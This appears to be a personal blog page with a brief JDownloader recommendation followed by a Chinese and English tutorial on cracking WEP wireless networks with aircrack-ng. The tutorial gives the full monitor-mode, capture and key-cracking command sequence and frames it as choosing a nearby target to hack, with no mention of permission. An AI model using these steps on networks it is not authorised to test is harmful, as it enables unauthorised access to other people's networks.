Have you ever been bothered in fetching big files from some fire-sharing sites like rapidshare or megaupload?
Here a great tool to save your time. With Jdownloader, you just need to input all download links at one time. It will arrange download schedule automatically, even fill in those random character for you
Download it at here
What’s more, it’s cross-platform, that is, u can use it on windows mac or linux.

Linux, Software, Windows
mac, Software, Windows
To view this ariticle in English, please click here
Linux是破解WEP网络的最好平台, 如果你希望在windows上破解,也不是不可以. 但是得给自己网卡安装一个改版驱动来打开网卡的监视功能
工具:
软件: aircrack-ng 平台: Linux 2.6.27 硬件: Intel 2200BG 无线网卡
安装:
- 确保无线网卡在linux下能正常工作, 如果不行 请访问相应的站点自行解决
- 安装aircrack-ng 工具包, 你可以通过linux发行版自带的包管理器来安装
- ArchLinux 用户: pacman -S aircrack-ng
- Debian & ubuntu用户: apt-get install aircrack-ng
数据抓取:
- 通过这个命令打开无线网卡的监视功能: airmon-ng start <interface>. 命令返回的结果应该是这样

- 开始监视周围的无线网络: airodump-ng <interface>
- 稍等片刻, 直到某些正在使用的无线网络出现,如图
然后你就可以选择一个破解的目标了
- 输入这个命令 捕获无线AP与客户机之间的数据流, airodump-ng –bssid xx:xx:xx:xx:xx:xx -w dump <interface>

破解:
- 当你觉得收集到了足够的数据包时(一般情况下dump文件在40k到85k之间). 就可以通过这个命令破解了: aircrack-ng -b xx:xx:xx:xx:xx:xx dump-01.cap -b 参数后面的mac地址即是你要破解的无线AP的mac地址
- Just wait & enjoy
Linux
查看本文的中文版 请点击这里
Linux is the best platform to do this job, of course u can hack a WIFI under windows as well, in that case u need to install a modded driver for your NIC to open monitor feature.
Tool:
aircrack-ng Platform: Linux 2.6.27 Hardware: Intel 2200BG Wireless network adapter
Installation:
- Make sure your wireless network card works well on linux. If u have questions, please visit wiki of your linux distro.
- Install aircrack-ng pack. U can simply do this through your package manager
- For ArchLinux user: pacman -S aircrack-ng
- For debian & ubuntu: apt-get install aircrack-ng
- For fedora: First add this repository Dag Wieers or Dries, then yum -y install aircrack-ng
Data Capture:
- Open the monitor function of your NIC through this command: airmon-ng start <interface>. then it should look like this:
- Start to capture data steam, airodump-ng <interface>
- Wait for a while, untill some APs and associated clients show up. Then u can choose a target to hack
- Type this command to capture data between your target AP and associated client, airodump-ng –bssid xx:xx:xx:xx:xx:xx -w dump <interface>
Cracking:
- When you think you have collected enough packet(usually the size of dump.cap should be between 40k to 85k). U can start to crack by this simple command: aircrack-ng -b xx:xx:xx:xx:xx:xx dump-01.cap The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets. You can use multiple files, just add all their names or you can use a wildcard such as dump*.cap.
- Just wait & enjoy
Linux
Recent Comments